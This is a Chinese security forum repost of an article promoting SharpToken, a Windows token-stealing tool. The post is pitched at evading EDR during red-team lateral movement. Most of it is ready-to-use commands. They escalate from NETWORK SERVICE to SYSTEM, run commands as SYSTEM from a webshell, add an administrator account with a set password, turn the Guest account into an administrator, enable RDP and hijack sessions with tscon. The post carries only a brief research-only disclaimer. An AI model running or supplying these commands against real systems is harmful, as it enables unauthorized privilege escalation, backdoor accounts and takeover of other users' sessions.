安全矩阵

 找回密码
 立即注册
搜索
查看: 361|回复: 0

提权神器!Windows令牌窃取专家

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-5-6 19:44:45 | 显示全部楼层 |阅读模式
BeichenDream Hack分享吧 2023-05-06 08:30 发表于新加坡


声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。


工具介绍

在红队横向移动的过程中,我们经常需要窃取其他用户的权限。在现代 EDR 的防御下,我们很难使用 Mimikatz 获取其他用户的权限,如果目标用户没有活着的进程,我们也没有办法使用“OpenProcessToken”来窃取 Token。

SharpToken 是一种利用令牌泄漏的工具,它可以从系统中的所有进程中找到泄漏的令牌并使用它们,如果你是低权限服务用户,你甚至可以用它升级到“NT AUTHORITY\SYSTEM”权限,无需目标用户的密码就可以切换到目标用户的桌面做更多的事情。

工具用法
  1. SharpToken By BeichenDream
  2. =========================================================

  3. Github : https://github.com/BeichenDream/SharpToken

  4. If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
  5. e.g.
  6. SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass

  7. Usage:
  8. SharpToken COMMAND arguments

  9. COMMANDS:
  10.         list_token [process pid]        [bypass]
  11.         list_all_token [process pid] [bypass]
  12.         add_user    <username> <password> [group] [domain] [bypass]
  13.         enableUser <username> <NewPassword> [NewGroup] [bypass]
  14.         delete_user <username> [domain] [bypass]
  15.         execute <tokenUser> <commandLine> [Interactive] [bypass]
  16.         enableRDP [bypass]
  17.         tscon <targetSessionId> [sourceSessionId] [bypass]

  18. example:
  19.     SharpToken list_token
  20.     SharpToken list_token bypass
  21.     SharpToken list_token 6543
  22.     SharpToken add_user admin Abcd1234! Administrators
  23.     SharpToken enableUser Guest Abcd1234! Administrators
  24.     SharpToken delete_user admin
  25.     SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
  26.     SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
  27.     SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
  28.     SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
  29.     SharpToken tscon 1
复制代码



提升权限

除了通常的Token窃取权限增强,SharpToken还支持通过Bypass获取完整的Token。

如果你是NT AUTHORITY/NETWORK SERVICE用户,你添加了bypass参数,SharpToken会从RPCSS窃取System,即无条件的NT AUTHORITY\NETWORK SERVICE到NT AUTHORITY\SYSTEM


ListToken

枚举信息包括SID、LogonDomain、UserName、Session、LogonType、TokenType、TokenHandle(Duplicate后Token的句柄)、TargetProcessId(Token产生的进程)、TargetProcessToken(源进程中Token的句柄)、Groups(Token用户所在的组)位于)

  1. SharpToken list_token
复制代码




枚举来自指定进程的令牌

  1. SharpToken list_token 468
复制代码


获取交互式shell

  1. execute "NT AUTHORITY\SYSTEM" cmd true
复制代码


获取命令执行结果(在webshell下执行)

  1. SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
复制代码







本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 21:59 , Processed in 0.012968 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表